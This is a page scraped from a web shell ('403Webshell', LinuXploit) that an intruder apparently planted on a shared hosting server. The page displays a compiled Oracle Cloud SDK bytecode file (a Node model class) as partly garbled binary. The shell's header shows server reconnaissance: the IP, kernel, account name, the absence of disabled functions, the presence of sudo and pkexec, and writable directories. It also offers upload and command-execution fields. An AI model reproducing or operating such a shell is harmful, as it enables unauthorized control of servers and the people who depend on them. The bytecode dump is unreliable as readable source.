403Webshell
Server IP : 162.144.4.212  /  Your IP : 216.73.216.108
Web Server : Apache
System : Linux gator2125.hostgator.com 5.14.0-162.23.1.9991722448259.nf.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 31 18:11:45 UTC 2024 x86_64
User : cozeellc ( 2980)
PHP Version : 8.3.31
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /usr/lib/python3.9/site-packages/oci/container_engine/models/__pycache__/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /usr/lib/python3.9/site-packages/oci/container_engine/models/__pycache__/node.cpython-39.pyc
a

���fYB�@s8ddlmZmZmZddlmZeGdd�de��ZdS)�)�formatted_flat_dict�
NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc@s�eZdZdZdZdZdZdZdZdZ	dZ
d	d
�Zedd��Z
e
jd
d��Z
edd��Zejdd��Zedd��Zejdd��Zedd��Zejdd��Zedd��Zejdd��Zedd��Zejdd��Zedd��Zejdd��Zed d!��Zejd"d!��Zed#d$��Zejd%d$��Zed&d'��Zejd(d'��Zed)d*��Zejd+d*��Zed,d-��Zejd.d-��Zed/d0��Zejd1d0��Zed2d3��Zejd4d3��Zed5d6��Zejd7d6��Zd8d9�Zd:d;�Zd<d=�Zd>S)?�Nodez,
    The properties that define a node.
    �CREATING�ACTIVE�UPDATING�DELETING�DELETED�FAILING�INACTIVEcKs�dddddddddddddddd�|_dddd	d
ddd
dddddddd�|_d|_d|_d|_d|_d|_d|_d|_d|_	d|_
d|_d|_d|_
d|_d|_d|_dS)a

        Initializes a new Node object with values from keyword arguments.
        The following keyword arguments are supported (corresponding to the getters/setters of this class):

        :param id:
            The value to assign to the id property of this Node.
        :type id: str

        :param name:
            The value to assign to the name property of this Node.
        :type name: str

        :param kubernetes_version:
            The value to assign to the kubernetes_version property of this Node.
        :type kubernetes_version: str

        :param availability_domain:
            The value to assign to the availability_domain property of this Node.
        :type availability_domain: str

        :param subnet_id:
            The value to assign to the subnet_id property of this Node.
        :type subnet_id: str

        :param node_pool_id:
            The value to assign to the node_pool_id property of this Node.
        :type node_pool_id: str

        :param fault_domain:
            The value to assign to the fault_domain property of this Node.
        :type fault_domain: str

        :param private_ip:
            The value to assign to the private_ip property of this Node.
        :type private_ip: str

        :param public_ip:
            The value to assign to the public_ip property of this Node.
        :type public_ip: str

        :param node_error:
            The value to assign to the node_error property of this Node.
        :type node_error: oci.container_engine.models.NodeError

        :param freeform_tags:
            The value to assign to the freeform_tags property of this Node.
        :type freeform_tags: dict(str, str)

        :param defined_tags:
            The value to assign to the defined_tags property of this Node.
        :type defined_tags: dict(str, dict(str, object))

        :param system_tags:
            The value to assign to the system_tags property of this Node.
        :type system_tags: dict(str, dict(str, object))

        :param lifecycle_state:
            The value to assign to the lifecycle_state property of this Node.
            Allowed values for this property are: "CREATING", "ACTIVE", "UPDATING", "DELETING", "DELETED", "FAILING", "INACTIVE", 'UNKNOWN_ENUM_VALUE'.
            Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
        :type lifecycle_state: str

        :param lifecycle_details:
            The value to assign to the lifecycle_details property of this Node.
        :type lifecycle_details: str

        �strZ	NodeErrorzdict(str, str)zdict(str, dict(str, object)))�id�name�kubernetes_version�availability_domain�	subnet_id�node_pool_id�fault_domain�
private_ip�	public_ip�
node_error�
freeform_tags�defined_tags�system_tags�lifecycle_state�lifecycle_detailsrrZkubernetesVersionZavailabilityDomainZsubnetIdZ
nodePoolIdZfaultDomainZ	privateIpZpublicIpZ	nodeErrorZfreeformTagsZdefinedTagsZ
systemTagsZlifecycleStateZlifecycleDetailsN)Z
swagger_typesZ
attribute_map�_id�_name�_kubernetes_version�_availability_domain�
_subnet_id�
_node_pool_id�
_fault_domain�_private_ip�
_public_ip�_node_error�_freeform_tags�
_defined_tags�_system_tags�_lifecycle_state�_lifecycle_details)�self�kwargs�r/�D/usr/lib/python3.9/site-packages/oci/container_engine/models/node.py�__init__.s^E��z
Node.__init__cCs|jS)z�
        Gets the id of this Node.
        The OCID of the compute instance backing this node.


        :return: The id of this Node.
        :rtype: str
        �r�r-r/r/r0r�s
zNode.idcCs
||_dS)z�
        Sets the id of this Node.
        The OCID of the compute instance backing this node.


        :param id: The id of this Node.
        :type: str
        Nr2)r-rr/r/r0r�s
cCs|jS)z�
        Gets the name of this Node.
        The name of the node.


        :return: The name of this Node.
        :rtype: str
        �rr3r/r/r0r�s
z	Node.namecCs
||_dS)z�
        Sets the name of this Node.
        The name of the node.


        :param name: The name of this Node.
        :type: str
        Nr4)r-rr/r/r0r�s
cCs|jS)z�
        Gets the kubernetes_version of this Node.
        The version of Kubernetes this node is running.


        :return: The kubernetes_version of this Node.
        :rtype: str
        �r r3r/r/r0r�s
zNode.kubernetes_versioncCs
||_dS)z�
        Sets the kubernetes_version of this Node.
        The version of Kubernetes this node is running.


        :param kubernetes_version: The kubernetes_version of this Node.
        :type: str
        Nr5)r-rr/r/r0r�s
cCs|jS)z�
        Gets the availability_domain of this Node.
        The name of the availability domain in which this node is placed.


        :return: The availability_domain of this Node.
        :rtype: str
        �r!r3r/r/r0r�s
zNode.availability_domaincCs
||_dS)z�
        Sets the availability_domain of this Node.
        The name of the availability domain in which this node is placed.


        :param availability_domain: The availability_domain of this Node.
        :type: str
        Nr6)r-rr/r/r0r�s
cCs|jS)z�
        Gets the subnet_id of this Node.
        The OCID of the subnet in which this node is placed.


        :return: The subnet_id of this Node.
        :rtype: str
        �r"r3r/r/r0rs
zNode.subnet_idcCs
||_dS)z�
        Sets the subnet_id of this Node.
        The OCID of the subnet in which this node is placed.


        :param subnet_id: The subnet_id of this Node.
        :type: str
        Nr7)r-rr/r/r0rs
cCs|jS)z�
        Gets the node_pool_id of this Node.
        The OCID of the node pool to which this node belongs.


        :return: The node_pool_id of this Node.
        :rtype: str
        �r#r3r/r/r0rs
zNode.node_pool_idcCs
||_dS)z�
        Sets the node_pool_id of this Node.
        The OCID of the node pool to which this node belongs.


        :param node_pool_id: The node_pool_id of this Node.
        :type: str
        Nr8)r-rr/r/r0r*s
cCs|jS)z�
        Gets the fault_domain of this Node.
        The fault domain of this node.


        :return: The fault_domain of this Node.
        :rtype: str
        �r$r3r/r/r0r6s
zNode.fault_domaincCs
||_dS)z�
        Sets the fault_domain of this Node.
        The fault domain of this node.


        :param fault_domain: The fault_domain of this Node.
        :type: str
        Nr9)r-rr/r/r0rBs
cCs|jS)z�
        Gets the private_ip of this Node.
        The private IP address of this node.


        :return: The private_ip of this Node.
        :rtype: str
        �r%r3r/r/r0rNs
zNode.private_ipcCs
||_dS)z�
        Sets the private_ip of this Node.
        The private IP address of this node.


        :param private_ip: The private_ip of this Node.
        :type: str
        Nr:)r-rr/r/r0rZs
cCs|jS)z�
        Gets the public_ip of this Node.
        The public IP address of this node.


        :return: The public_ip of this Node.
        :rtype: str
        �r&r3r/r/r0rfs
zNode.public_ipcCs
||_dS)z�
        Sets the public_ip of this Node.
        The public IP address of this node.


        :param public_ip: The public_ip of this Node.
        :type: str
        Nr;)r-rr/r/r0rrs
cCs|jS)z�
        Gets the node_error of this Node.
        An error that may be associated with the node.


        :return: The node_error of this Node.
        :rtype: oci.container_engine.models.NodeError
        �r'r3r/r/r0r~s
zNode.node_errorcCs
||_dS)z�
        Sets the node_error of this Node.
        An error that may be associated with the node.


        :param node_error: The node_error of this Node.
        :type: oci.container_engine.models.NodeError
        Nr<)r-rr/r/r0r�s
cCs|jS)a�
        Gets the freeform_tags of this Node.
        Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace.
        For more information, see `Resource Tags`__.
        Example: `{"Department": "Finance"}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :return: The freeform_tags of this Node.
        :rtype: dict(str, str)
        �r(r3r/r/r0r�szNode.freeform_tagscCs
||_dS)a�
        Sets the freeform_tags of this Node.
        Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace.
        For more information, see `Resource Tags`__.
        Example: `{"Department": "Finance"}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :param freeform_tags: The freeform_tags of this Node.
        :type: dict(str, str)
        Nr=)r-rr/r/r0r�scCs|jS)a�
        Gets the defined_tags of this Node.
        Defined tags for this resource. Each key is predefined and scoped to a namespace.
        For more information, see `Resource Tags`__.
        Example: `{"Operations": {"CostCenter": "42"}}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :return: The defined_tags of this Node.
        :rtype: dict(str, dict(str, object))
        �r)r3r/r/r0r�szNode.defined_tagscCs
||_dS)a�
        Sets the defined_tags of this Node.
        Defined tags for this resource. Each key is predefined and scoped to a namespace.
        For more information, see `Resource Tags`__.
        Example: `{"Operations": {"CostCenter": "42"}}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm


        :param defined_tags: The defined_tags of this Node.
        :type: dict(str, dict(str, object))
        Nr>)r-rr/r/r0r�scCs|jS)a&
        Gets the system_tags of this Node.
        Usage of system tag keys. These predefined keys are scoped to namespaces.
        Example: `{"orcl-cloud": {"free-tier-retained": "true"}}`


        :return: The system_tags of this Node.
        :rtype: dict(str, dict(str, object))
        �r*r3r/r/r0r�szNode.system_tagscCs
||_dS)a0
        Sets the system_tags of this Node.
        Usage of system tag keys. These predefined keys are scoped to namespaces.
        Example: `{"orcl-cloud": {"free-tier-retained": "true"}}`


        :param system_tags: The system_tags of this Node.
        :type: dict(str, dict(str, object))
        Nr?)r-rr/r/r0r�scCs|jS)a�
        Gets the lifecycle_state of this Node.
        The state of the node.

        Allowed values for this property are: "CREATING", "ACTIVE", "UPDATING", "DELETING", "DELETED", "FAILING", "INACTIVE", 'UNKNOWN_ENUM_VALUE'.
        Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.


        :return: The lifecycle_state of this Node.
        :rtype: str
        )r+r3r/r/r0r�s
zNode.lifecycle_statecCs gd�}t||�sd}||_dS)z�
        Sets the lifecycle_state of this Node.
        The state of the node.


        :param lifecycle_state: The lifecycle_state of this Node.
        :type: str
        )rrr	r
rrr
ZUNKNOWN_ENUM_VALUEN)rr+)r-rZallowed_valuesr/r/r0r�s

cCs|jS)z�
        Gets the lifecycle_details of this Node.
        Details about the state of the node.


        :return: The lifecycle_details of this Node.
        :rtype: str
        �r,r3r/r/r0rs
zNode.lifecycle_detailscCs
||_dS)z�
        Sets the lifecycle_details of this Node.
        Details about the state of the node.


        :param lifecycle_details: The lifecycle_details of this Node.
        :type: str
        Nr@)r-rr/r/r0rs
cCst|�S�N)rr3r/r/r0�__repr__&sz
Node.__repr__cCs|durdS|j|jkS)NF)�__dict__�r-�otherr/r/r0�__eq__)szNode.__eq__cCs
||kSrAr/rDr/r/r0�__ne__/szNode.__ne__N) �__name__�
__module__�__qualname__�__doc__ZLIFECYCLE_STATE_CREATINGZLIFECYCLE_STATE_ACTIVEZLIFECYCLE_STATE_UPDATINGZLIFECYCLE_STATE_DELETINGZLIFECYCLE_STATE_DELETEDZLIFECYCLE_STATE_FAILINGZLIFECYCLE_STATE_INACTIVEr1�propertyr�setterrrrrrrrrrrrrrrrBrFrGr/r/r/r0rs�x





























rN)Zoci.utilrrrZoci.decoratorsr�objectrr/r/r/r0�<module>s

Youez - 2016 - github.com/yon3zu
LinuXploit